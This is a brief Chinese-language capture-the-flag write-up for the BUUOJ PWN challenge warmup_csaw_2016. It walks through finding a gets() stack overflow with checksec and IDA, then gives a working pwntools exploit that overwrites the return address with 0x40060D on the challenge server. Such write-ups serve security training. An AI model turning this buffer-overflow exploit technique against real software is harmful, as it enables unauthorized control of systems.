题目(三):
【题型】PWN
【题目】warmup_csaw_2016
【来源】(buuoj)https://buuoj.cn/challenges#warmup_csaw_2016
【思路】栈溢出
【具体步骤】
Step1:checksec指令查看,发现是一个没有任何保护的64位的程序。
Step2:将程序放到IDApro下进行静态分析。
Step3:查看main函数的伪代码(F5,如果被占用,就用Fn+F5),发现有一个gets函数,猜测是栈溢出,栈的大小是64个字节,但是v5的长度位0x48(0x48+0x08)。
Step4:编写exp,得到flag。
源码为:
from pwn import *
p=remote("node4.buuoj.cn",25286)
payload=b'A'*0x48+p64(0x40060D)
p.sendline(payload)
p.interactive()